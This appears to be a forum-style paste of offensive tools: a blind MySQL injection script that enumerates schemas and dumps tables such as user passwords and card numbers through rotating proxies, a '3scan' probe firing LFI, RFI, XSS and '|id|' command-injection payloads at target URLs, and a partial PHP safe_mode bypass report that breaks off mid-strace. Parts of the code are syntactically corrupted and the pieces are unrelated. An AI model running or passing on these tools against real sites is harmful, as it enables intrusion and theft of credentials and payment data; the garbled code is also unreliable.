fuzz_columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber","order_payment","card_number","is_admin","cc_number","ccnum","cc_num","credit_card_number","cvc_code","billing_first_name","cvv","cvv2","firstname","lastname","fname","lname","first","last"]
 

import urllib, sys, re, os, socket, httplib, urllib2, time

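#the guts and glory - Binary Algorithim that does all the guessing
def GuessValue(URL):
    """Binary-search the integer that the injected condition in `URL` is
    compared against, between the module globals lower_bound and upper_bound.

    `URL` is the request prefix (presumably ending in the expression whose
    value is wanted -- confirm against the callers); ">N" and finally "=N" are
    appended, the page is fetched through the next opener in proxy_list and
    searched for the "true" marker `string` with re.findall, so regex
    metacharacters in -s must be escaped by the user.  Bumps the module
    counters gets / proxy_num once per request.

    Exits the process when the final equality check fails, or -- new here --
    after MAX_FAILURES consecutive request errors; the original swallowed
    every error and retried forever, so a dead proxy or target spun this loop
    indefinitely.
    """
    global gets
    global proxy_num
    MAX_FAILURES = 10
    lower = lower_bound
    upper = upper_bound
    failures = 0
    while lower < upper:
        try:
            mid = (lower + upper) // 2   # integer division under Python 3 as well
            head_URL = URL + ">"+str(mid)
            #print head_URL
            gets+=1
            proxy_num+=1
            source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
            match = re.findall(string,source)
            if len(match) >= 1:
                lower = mid + 1
            else:
                upper = mid
            failures = 0
        except (KeyboardInterrupt, SystemExit):
            raise
        except Exception:
            failures += 1
            if failures >= MAX_FAILURES:
                print "\n[-]", MAX_FAILURES, "consecutive request failures, giving up."
                sys.exit(1)

    if lower > lower_bound and lower < upper_bound:
        value = lower
    else:
        # hit a bound: confirm with an equality test before trusting it
        head_URL = URL + "="+str(lower)
        gets+=1
        proxy_num+=1
        source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
        match = re.findall(string,source)
        if len(match) >= 1:
            value = lower
        else:
            print "Could not find the ascii character! There must be a problem.."
            print "Check to make sure your using the app right!"
            print "READ xprog's blind sql tutorial!\n"
            sys.exit(1)
    return value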

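#determine platform
# Python 3.3+ reports sys.platform as 'linux' rather than 'linux2', so match
# on the prefix (this also covers the old 'linux-i386' value).
if sys.platform.startswith('linux') or sys.platform == 'darwin':
    SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
else:
    SysCls = 'unknown'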

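#say hello
# Clear the screen -- but not when the platform is unknown: os.system('unknown')
# would merely try to run a command called "unknown".
if SysCls != 'unknown':
    os.system(SysCls)
# no arguments at all: show the short banner and stop
if len(sys.argv) <= 1:
    print "\n" + "\n".join((
        "|---------------------------------------------------------------|",
        "| rsauron[@]gmail[dot]com                                 v3.0  |",
        "|   7/2008      blindext.py                                     |",
        "|      -Blind MySQL v5+ Information_schema Database Enumeration |",
        "|      -Blind MySQL v4+ Data Extractor                          |",
        "|      -Blind MySQL v4+ Table & Column Fuzzer                   |",
        "| Usage: blindext.py [options]                                  |",
        "|                    -h help                    darkc0de.com    |",
        "|---------------------------------------------------------------|",
    )) + "\n"
    sys.exit(1)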

#define variables
# Run-time state shared with the helpers below; the values here are the
# defaults before the command line is parsed.

# target and matching
site = ""                  # -u, URL of the injectable page
string = ""                # -s, text present in the page when the condition is true
proxy = "None"             # -p, "host:port" or a file of them; "None" = direct
line_URL = ""

# mode and its arguments ("None" = not given)
mode = "None"              # --schema / --dump / --dbs / --fuzz / --info
arg_dump, arg_schema, arg_dbs = "None", "None", "None"
arg_database, arg_table, arg_columns = "None", "None", "None"   # -D / -T / -C
arg_mysqldb = ""
lim_num = 0                # -r, first row to extract

# output
dbt = "blindextlog.txt"    # -o, log file
darkc0de = ""
value = ""

# binary-search state and request bookkeeping
lower_bound, upper_bound = 0, 10000
mid = 0
let_pos = 1
gets = 0                   # requests issued so far
count = 0                  # argv index while parsing options

#help option
# "-h" anywhere on the command line prints the full usage text and stops,
# exactly as the original's scan of sys.argv did.
if "-h" in sys.argv:
    help_text = "\n".join((
        "\n   Usage: ./blindext.py [options]        rsauron[@]gmail[dot]com darkc0de.com",
        "\tModes:",
        "\tDefine: --schema Enumerate Information_schema Database.",
        "\tDefine: --dump   Extract information from a Database, Table and Column.",
        "\tDefine: --dbs    Shows all databases user has access too.",
        "\tDefine: --fuzz   Fuzz Tables and Columns.",
        "\tDefine: --info   Prints server version, username@location, database name.",
        "\n\tRequired:",
        "\tDefine: -u       \"www.site.com/news.php?id=234\"",
        "\tDefine: -s       \"truetextinpage\"",
        "\n\tModes dump and schema options:",
        "\tDefine: -D       \"database_name\"",
        "\tDefine: -T       \"table_name\"",
        "\tDefine: -C       \"column_name,column_name...\"",
        "\n\tOptional:",
        "\tDefine: -r       row to begin extracting info at.",
        "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\"",
        "\tDefine: -o       \"ouput_file_name.txt\"          Default:blindextlog.txt",
        "\n   Ex: ./blindext.py --dbs -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -o output.txt",
        "   Ex: ./blindext.py --fuzz -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -p 127.0.0.1:8080",
        "   Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog",
        "   Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog -T orders -p proxy.txt",
        "   Ex: ./blindext.py --dump -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D newjoom -T jos_users -C username,password",
    ))
    print help_text
    sys.exit(1)

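#Check args
# Option parsing.  A value flag takes the argv entry that follows it; a value
# flag given as the last argument is reported instead of raising IndexError
# as the original did.  (The original loop also had mismatched indentation
# from the "--schema" branch onward and did not compile.)
_MODE_FLAGS = ("--dump", "--schema", "--dbs", "--fuzz", "--info")
_VALUE_FLAGS = ("-u", "-s", "-o", "-p", "-D", "-T", "-C", "-r")
for count, arg in enumerate(sys.argv):
    if arg in _MODE_FLAGS:
        mode = arg
        if arg == "--dump":
            arg_dump = arg
        elif arg == "--schema":
            arg_schema = arg
        elif arg == "--dbs":
            arg_dbs = arg
        elif arg == "--fuzz":
            arg_fuzz = arg
        else:
            arg_info = arg
        continue
    if arg not in _VALUE_FLAGS:
        continue
    if count + 1 >= len(sys.argv):
        print "\n[-] Option", arg, "needs a value."
        print "[-] For help -h\n"
        sys.exit(1)
    val = sys.argv[count + 1]
    if arg == "-u":
        site = val
    elif arg == "-s":
        string = val
    elif arg == "-o":
        dbt = val
    elif arg == "-p":
        proxy = val
    elif arg == "-D":
        arg_database = val
    elif arg == "-T":
        arg_table = val
    elif arg == "-C":
        arg_columns = val
    elif arg == "-r":
        lim_num = val
# the original's counter ended at len(sys.argv); keep that value in case
# later code reads it
count = len(sys.argv)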

#Title write
# Open the log (append mode, path from -o) and show the banner on the screen
# and in the log.
file = open(dbt, "a")
_BANNER = (
    "|---------------------------------------------------------------|",
    "| rsauron[@]gmail[dot]com                                 v3.0  |",
    "|   7/2008      blindext.py                                     |",
    "|      -Blind MySQL v5+ Information_schema Database Enumeration |",
    "|      -Blind MySQL v4+ Data Extractor                          |",
    "|      -Blind MySQL v4+ Table & Column Fuzzer                   |",
    "| Usage: blindext.py [options]                                  |",
    "|                    -h help                    darkc0de.com    |",
    "|---------------------------------------------------------------|",
)
print "\n" + "\n".join(_BANNER)
file.write("\n\n" + "\n".join(_BANNER))
   
#Arg Error Checking
# Argument validation. `site`, `string`, `mode`, `proxy`, the `arg_*` values
# and `lim_num` are filled in by the argv loop above this excerpt; an option
# that was not given holds the literal string "None" (not the None object),
# which is what the comparisons below test for.
if site == "":
        # NOTE(review): the message names both -u and -s, but only `site` is
        # checked here; `string` has its own check immediately below.
        print "\n[-] Must include -u flag and -s flag."
        print "[-] For help -h\n"
        sys.exit(1)
if string == "":
        print "\n[-] Must include -s flag followed by \"truetextinpage\" string."
        print "[-] For help -h\n"
        sys.exit(1)
if mode == "None":
        print "\n[-] Mode must be specified --schema --dbs --dump --fuzz"
        print "[-] For help -h\n"
        sys.exit(1)
if mode == "--schema" and arg_database == "None":
        print "[-] Must include -D flag!"
        print "[-] For Help -h\n"
        sys.exit(1)
if mode == "--dump":
        if arg_table == "None" or arg_columns == "None":
                print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
                print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
                print "[-] For help -h\n"
                sys.exit(1)
if proxy != "None":
        # Heuristic: a value that splits into exactly two pieces on "." is
        # treated as a path to a proxy list file (presumably "name.ext") and
        # read whole; anything else is taken as an inline proxy spec. The
        # file handle is never closed.
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        # Drop one trailing newline, then turn the text into a list with one
        # proxy entry per line.
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if arg_columns != "None":
        # -C takes a comma-separated list of column names.
        arg_columns = arg_columns.split(",")
# Only the exact prefix "http://" is recognised; a URL with any other scheme is
# prefixed again rather than left alone.
if site[:7] != "http://":
    site = "http://"+site

#Build proxy list
# Proxy set-up. Every socket opened from here on inherits a 10 s default
# timeout. Each proxy entry is verified by fetching http://www.google.com
# through it; the bare `except:` swallows any failure (in Python 2 this
# includes KeyboardInterrupt), so a failing proxy is logged and skipped. If
# every proxy fails the script exits. Without -p, `proxy_list` holds a single
# direct opener. Later sections index `proxy_list` with
# proxy_num % proxy_len, i.e. requests are spread round-robin.
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site+"\n")
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":

        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    # A second, equivalent opener is what actually gets stored.
                    proxy_list.append(urllib2.build_opener(proxy_handler))
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1)
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())

#Gather Server Config
# Version probe. For ser_ver = 3, 4, 5 the suffix
# `and substring(@@version,1,1)=<ser_ver>` is appended to the URL and the
# response is searched for the caller-supplied "true page" marker `string`.
# `string` goes through re.findall(), so it is interpreted as a regular
# expression, not as literal text. Defender note: this fixed suffix with an
# incrementing digit, repeated from one client, is a reliable log signature
# for this phase of the tool.
# Control flow: a match breaks out of the loop with ser_ver set (after
# rejecting --schema/--dbs on a 4.x server); reaching 6 with no match exits.
# Request failures land in the bare `except:` and `pass`, which leaves
# ser_ver unchanged, so a host that keeps failing makes this loop retry
# forever (only proxy_num advances). `gets` (request counter) is assumed to
# be initialised before this excerpt.
# NOTE(review): as pasted, the final `except:` is indented to 4 spaces, which
# matches no enclosing block, so the file would not parse as-is (this looks
# like tab/space mangling by the blog).
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...")
proxy_num = 0
proxy_len = len(proxy_list)
ser_ver = 3
while 1:
        try:
                config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
                proxy_num+=1
                source = proxy_list[proxy_num % proxy_len].open(config_URL).read()
                match = re.findall(string,source)
                if len(match) >= 1:
                        print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!"
                        file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
                        if int(ser_ver) <= 4 and mode == "--schema":
                                print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
                                file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
                                print "[-] Done"
                                file.write("[-] Done")
                                sys.exit(1)
                        if int(ser_ver) <= 4 and mode == "--dbs":
                                print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
                                file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
                                print "[-] Done"
                                file.write("[-] Done")
                                sys.exit(1)
                        break
                if int(ser_ver) >= 6:
                        print "\t[-] Not a MySQL server or the string your using is not being found!"
                        file.write("\n\t[-] Not a MySQL server or the string your using is not being found!")
                        print "[-] Done"
                        file.write("[-] Done")
                        sys.exit(1)
                ser_ver+=1
                gets+=1
        # sys.exit() above raises SystemExit inside the try; re-raise it (and
        # Ctrl-C) instead of letting the catch-all below swallow them.
        except (KeyboardInterrupt, SystemExit):
            raise
    except:
                pass
       
#Build URLS
# Query construction per mode. `count_URL` is a complete condition that the
# row-count step resolves to a number; `line_URL` is a prefix that the main
# loop completes with a LIMIT offset and a character position, extracting one
# byte per resolved value. Database and table names are embedded as 0x-hex
# literals, so no quote characters appear in the URL. `darkc0de` (the
# accumulator for the concat() column list) is assumed to be initialised
# before this excerpt, since it is only ever appended to here.
# NOTE(review): indentation is inconsistent throughout this section (4- and
# 8-space bodies under the same `if`/`elif`), so it would not parse as pasted.
if mode == "--schema":
    if arg_database != "None" and arg_table == "None":
                print "[+] Showing Tables from database \""+arg_database+"\""
                file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
                count_URL = site+"+and+((SELECT+COUNT(table_name)"
                count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+"))"
                line_URL = site+"+and+ascii(substring((SELECT+table_name"
                line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")
        if arg_database != "None" and arg_table != "None":
                print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
                file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
                count_URL = site+"+and+((SELECT+COUNT(column_name)"
                count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
                count_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
                line_URL = site+"+and+ascii(substring((SELECT+column_name"
                line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
                line_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")
elif mode == "--dump":
    print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    print "[+] and Column(s) "+str(arg_columns)
    file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
        file.write("\n[+] Column(s) "+str(arg_columns))
        # Join the requested columns with a ":" (0x3a) separator.
        for column in arg_columns:
                darkc0de += column+",0x3a,"
        # rstrip() takes a character set, so this removes any trailing run of
        # the characters 0 x 3 a , rather than the literal ",0x3a," suffix.
        darkc0de = darkc0de.rstrip("0x3a,")
        count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"
        count_URL = count_URL+""+arg_database+"."+arg_table+"))"
        line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"
        line_URL = line_URL+""+arg_database+"."+arg_table
        # ser_ver comes from the version probe above; on a 4.x server the
        # database qualifier is dropped unless it is the mysql schema.
        if ser_ver == 4:
                count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_table+"))"
                line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_table
                if arg_database == "mysql" or arg_database == "MYSQL" or arg_database == "MySQL":
                        count_URL = site+"+and+((SELECT+COUNT(*)+FROM+mysql."+arg_table+"))"
                        line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+mysql."+arg_table
elif mode == "--dbs":
    print "[+] Showing all databases current user has access too!"
    file.write("\n[+] Showing all databases current user has access too!")
        count_URL = site+"+and+((SELECT+COUNT(schema_name)"
        count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
    line_URL = site+"+and+ascii(substring((SELECT+schema_name"
    line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
# Runs for every mode, including --info, which sets neither URL above; it
# therefore assumes line_URL already exists (it is overwritten just below).
line_URL += "+LIMIT+"

if mode == "--info":
        print "[+] Showing database version, username@location, and database name!"
    file.write("\n[+] Showing database version, username@location, and database name!")
    # No row count for --info; the main loop treats it as a single row.
    count_URL = "Nothing"
    line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"


#Lets Fuzz
# Table/column guessing from the boolean response. `fuzz_tables` and
# `fuzz_columns` are word lists defined outside this excerpt. The tokens TABLE
# and COLUMN in the two template URLs are placeholders filled in with
# str.replace() (every occurrence of the token is replaced). A failing request
# is swallowed by the bare `except:` and the next candidate is tried; Ctrl-C
# and SystemExit are re-raised. This branch closes the log and exits with
# status 1 even on normal completion. Defender note: a burst of requests
# differing only in the embedded table/column name is the visible footprint.
if mode == "--fuzz":
        print "\n[%s] StartTime" % time.strftime("%X")
        file.write("\n\n[%s] StartTime" % time.strftime("%X"))
        print "[+] Fuzzing Tables..."
        file.write("\n[+] Fuzzing Tables...")
        fuzz_TABLE_url = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
        for table in fuzz_tables:
                try:
                        proxy_num+=1
                        gets+=1
                        table_URL = fuzz_TABLE_url.replace("TABLE",table)
                        source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
                        match = re.findall(string,source)
                        if len(match) >= 1:
                                print "\n[Table]:",table
                                file.write("\n\n[Table]:"+table)
                                # Only tables that answered "true" get their
                                # columns guessed.
                                fuzz_COLUMN_url = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
                                for column in fuzz_columns:
                                        try:
                                                proxy_num+=1
                                                gets+=1
                                                column_URL = fuzz_COLUMN_url.replace("COLUMN",column)
                                                source = proxy_list[proxy_num % proxy_len].open(column_URL).read()
                                                match = re.findall(string,source)
                                                if len(match) >= 1:
                                                        print "[Column]:",column
                                                        file.write("\n[Column]:"+column)
                                        except (KeyboardInterrupt, SystemExit):
                                                raise
                                        except:
                                                pass
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        print "\n[%s] EndTime" % time.strftime("%X")
        print "[-] Total URL Requests",gets
        file.write("\n\n[%s] EndTime" % time.strftime("%X"))
        file.write("\n[-] Total URL Requests "+str(gets))
        print "[-] Done\n"
        file.write("\n[-] Done\n")
        print "Don't forget to check", dbt,"\n"
        file.close()
        sys.exit(1)

#lets count how many rows before we begin
# Row count. GuessValue() is defined earlier in the script (outside this
# excerpt) and resolves one numeric value through the boolean oracle; its
# result must be an int because it feeds range() below. --info has no count
# query and always walks a single "row".
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
if mode != "--info":
        row_value = GuessValue(count_URL)
        print "[+] Number of Rows: ",row_value,"\n"
        file.write("\n[+] Number of Rows: "+str(row_value)+"\n")
else:
        row_value = 1
#print line_URL
#print Count_URL
       
#Primary Loop
# Character-by-character extraction. `lower_bound` is unused in this excerpt
# and `upper_bound` only seeds the loop sentinel (chr(127)). `let_pos` (the
# current character index) must have been initialised before this excerpt: it
# is read in the loop body before the reset on the last line. `lim_num`
# arrives as a string from argv (-r), hence the int() conversions. For each
# row, characters are requested until GuessValue() returns 0, which ends the
# row. A failed request hits the bare `except:` without advancing let_pos, so
# the same position is retried indefinitely on a persistent error. The
# trailing `data_row+=1` has no effect: the for loop rebinds data_row.
lower_bound = 0
upper_bound = 127
for data_row in range(int(lim_num), row_value):
        sys.stdout.write("[%s]: " % (lim_num))
        file.write("\n[%s]: " % (lim_num))
        sys.stdout.flush()
        value = chr(upper_bound)
        while value != chr(0):
                try:
                        if mode != "--info":
                                # line_URL ends in "+LIMIT+"; append the row
                                # offset and the character position.
                                Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
                                #print Guess_URL
                                value = chr(GuessValue(Guess_URL))
                                sys.stdout.write("%s" % (value))
                                file.write(value)
                                sys.stdout.flush()
                                let_pos+=1
                        else:
                                # --info has no row offset, only a position.
                                Guess_URL = line_URL + str(let_pos)+",1))"
                                #print Guess_URL
                                value = chr(GuessValue(Guess_URL))
                                sys.stdout.write("%s" % (value))
                                file.write(value)
                                sys.stdout.flush()
                                let_pos+=1
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        print
        lim_num = int(lim_num) + 1
        let_pos = 1
        data_row+=1

#Lets wrap it up!
# Summary to console and log; `gets` is the running request counter. This is
# the only place on the non-fuzz path where the log handle is closed.
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] %s" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()

3scan ( lfi-xss-rfi-cmd)

[code]

#!/usr/bin/python

#Checks LFI,XSS,RFI,CMD injection searches source and http response (simple)


#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com


import sys, httplib, urllib2, re


#Don't change LFI,XSS, or CMD
# Static probe suffixes appended verbatim to the target URL by the check
# functions below. Because they never vary, they are straightforward WAF/IDS
# signatures. RFI_TITLE is declared but never used: rfi() matches the literal
# "Target" instead. RFI points at a third-party host chosen by the original
# author; the file it names is outside this listing.

LFI = "../../../../../../../../../../../../etc/passwd"

RFI = "http://yozurino.com/r.txt?"

RFI_TITLE = "Target"

XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

CMD = "|id|"


def main(host):
   """Run the four probes against one target.

   `host` is a URL that must end in "=" (a query parameter awaiting a value);
   a leading "http://" is stripped first, and the check functions add it
   back. The probes run in the fixed order XSS, LFI, RFI, CMD. The single
   except wraps the whole sequence, so the first urllib2 HTTPError/URLError
   aborts the remaining checks for this host; other exception types
   propagate. The trailing `pass` has no effect.
   """

   host = host.replace("http://","")

   if host[-1:] != "=":

      print "\n[-] Host should end with a \'=\'\n"

      print "[-]",host

      sys.exit(1)


   print "\n[+] Host:",host


   try:

      print "\n[+] Checking XSS"

      xss(host)

      print "\n[+] Checking LFI"

      lfi(host)

      print "\n[+] Checking RFI"

      rfi(host)

      print "\n[+] Checking CMD"

      cmd(host)

   except(urllib2.HTTPError, urllib2.URLError), msg:

      print "[-] Error Occurred:",msg

      pass



def rfi(host):
   """Remote file inclusion probe; issues two HTTP requests per host.

   The status line is fetched with the legacy httplib.HTTP interface and the
   body separately via urllib2; a hit requires both status 200 and the body
   containing "Target" (the RFI_TITLE constant is not used here).
   host.rsplit("/") splits on every slash, so [0] is the hostname and [1] is
   only the first path segment; a target with a deeper path gets the wrong
   request path in the httplib call.
   NOTE(review): `except(),msg:` names an empty tuple, which catches nothing,
   so any error propagates to main(), whose handler covers only urllib2
   errors.
   """


   try:

      h = httplib.HTTP(host.rsplit("/")[0])

      h.putrequest("GET","/"+host.rsplit("/")[1]+RFI)

      h.putheader("Host", host.rsplit("/")[0])

      h.endheaders()

      status, reason, headers = h.getreply()

      source = urllib2.urlopen("http://"+host+RFI).read()

      if re.search("Target", source) and status == 200:

         print "[+] RFI:",host+RFI,"\n[+]",status, reason

      else:

         print "[-] Not Vuln."

   except(),msg:

      #print "[-] Error Occurred",msg

      pass


def xss(host):
   """Reflected XSS probe: fetch host+XSS and report if "XSS" appears in the body.

   Matching the bare word "XSS" anywhere in the response is a weak oracle
   (any page that happens to contain that text is reported). Network errors
   propagate to the caller.
   """

   source = urllib2.urlopen("http://"+host+XSS).read()

   if re.search("XSS", source) != None:

      print "[!] XSS:",host+XSS

   else:

      print "[-] Not Vuln."


def cmd(host):
   """Command injection probe: fetch host+CMD and report if "uid=" appears in the body.

   Network errors propagate to the caller.
   """

   source = urllib2.urlopen("http://"+host+CMD).read()

   if re.search("uid=", source) != None:

      print "[!] CMD:",host+CMD

   else:

      print "[-] Not Vuln."


def lfi(host):
   """Local file inclusion probe: fetch host+LFI and report if "root:" appears.

   A second request is meant to be a variant of the first (the console text
   mentions a null byte), but as pasted the appended suffix is the empty
   string, so it repeats the first request verbatim and prints a second
   verdict for the same response. Network errors propagate to the caller.
   """


   source = urllib2.urlopen("http://"+host+LFI).read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI

   else:

      print "[-] Not Vuln."

   source = urllib2.urlopen("http://"+host+LFI+"").read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI+""

   else:

      print "[-] Not Vuln. w/  Null Byte"


# Entry point: expects exactly two arguments, a mode flag and its value.
# -l/-list reads one target per line from a file (the handle is never closed;
# each line has its newline stripped before being passed to main()); any
# other flag value is treated as a single site.
# NOTE(review): as pasted, the `if` line for -l/-list is corrupted (`{ :` at
# its end and a stray `}` two lines later) and would not parse.
if len(sys.argv) != 3:

   print "\nUsage: ./3scan.py "

   print "ex: ./3scan.py -s www.example.com/index.php?page="

   print "ex: ./3scan.py -list /home/d3hydr8/sites.txt"

   print "\t[options]"

   print "\t   -s/-site  : Searches just that site"

   print "\t   -l/-list  : Searches list"

   sys.exit(1)


print "\n   d3hydr8[at]gmail[dot]com 3scan v1.0"

print "---------------------------------------"


if sys.argv[1].lower() == "-l" or sys.argv[1].lower() == "-list"{ :

}

   try:

        sites = open(sys.argv[2], "r").readlines()

   except(IOError):

        print "Error: Check your file path\n"

        sys.exit(1)

   for host in sites:

      main(host.replace("\n",""))

else:

   main(sys.argv[2])


print "\n[+] Done\n"

[/code]

PHP 5.2.12 safe mode and open basedir bypass

about this vuln

Description:
------------
PHP lstat()s the full pathname many times (at least 4) before it reads the file it is looking for; the per-component checks and the final open() are separate system calls, so they are not atomic.
This behavior appears when the Apache httpd configuration specifies PHP_ADMIN_VALUE open_basedir, or when safe_mode is On.

Test script:
---------------
To reproduce the problem please create a page phpinfo.php: "".

I have httpd 2.2.15 and PHP 5.2.13.

[root@svilpar4 ~]# /usr/local/apache2/bin/httpd -V
Server version: Apache/2.2.15 (Unix)
Server built: Jul 9 2010 17:30:06
Server's Module Magic Number: 20051115:24
Server loaded: APR 1.2.7, APR-Util 1.2.7
Compiled using: APR 1.2.7, APR-Util 1.2.7
Architecture: 64-bit
Server MPM: Prefork
threaded: no
forked: yes (variable process count)
Server compiled with....
-D APACHE_MPM_DIR="server/mpm/prefork"
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=128
-D HTTPD_ROOT="/usr/local/apache2"
-D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
-D DEFAULT_PIDLOG="logs/httpd.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_LOCKFILE="logs/accept.lock"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="conf/mime.types"
-D SERVER_CONFIG_FILE="conf/httpd.conf"

[root@svilpar4 ~]# /usr/local/php5.2.13/bin/php -v
PHP 5.2.13 (cli) (built: Jul 1 2010 16:02:03)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

Now we specify PHP_ADMIN_VALUE open_basedir in Virtual host configuration:

                PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace"


        ServerName damorealt.xoom.it
        DocumentRoot "/usr/local/myspace/webspace/httpdocs"
    CustomLog   /var/log/httpd/damorealt/access_log   combined
    ErrorLog   /var/log/httpd/damorealt/error_log


Stop and start Apache httpd, attach "strace -f" to all httpd instances, and then request the page http://damorealt.xoom.it/phpinfo.php to reproduce the behavior.

Expected result:
----------------
If PHP_ADMIN_VALUE open_basedir "/usr/local/myspace/webspace" is removed and safe_mode is Off :

26235 accept(3, {sa_family=AF_INET, sin_port=htons(59366), sin_addr=inet_addr("212.48.14.186")}, [17179869200]) = 15
26235 getsockname(15, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("151.99.197.198")}, [17179869200]) = 0
26235 fcntl(15, F_GETFL)                = 0x2 (flags O_RDWR)
26235 fcntl(15, F_SETFL, O_RDWR|O_NONBLOCK) = 0
26235 read(15, "GET /phpinfo.php HTTP/1.0\r\nUser-"..., 8000) = 129
26235 gettimeofday({1278696735, 988799}, NULL) = 0
26235 stat("/usr/local/myspace/webspace/httpdocs/phpinfo.php", {st_mode=S_IFREG|0644, st_size=16, ...}) = 0
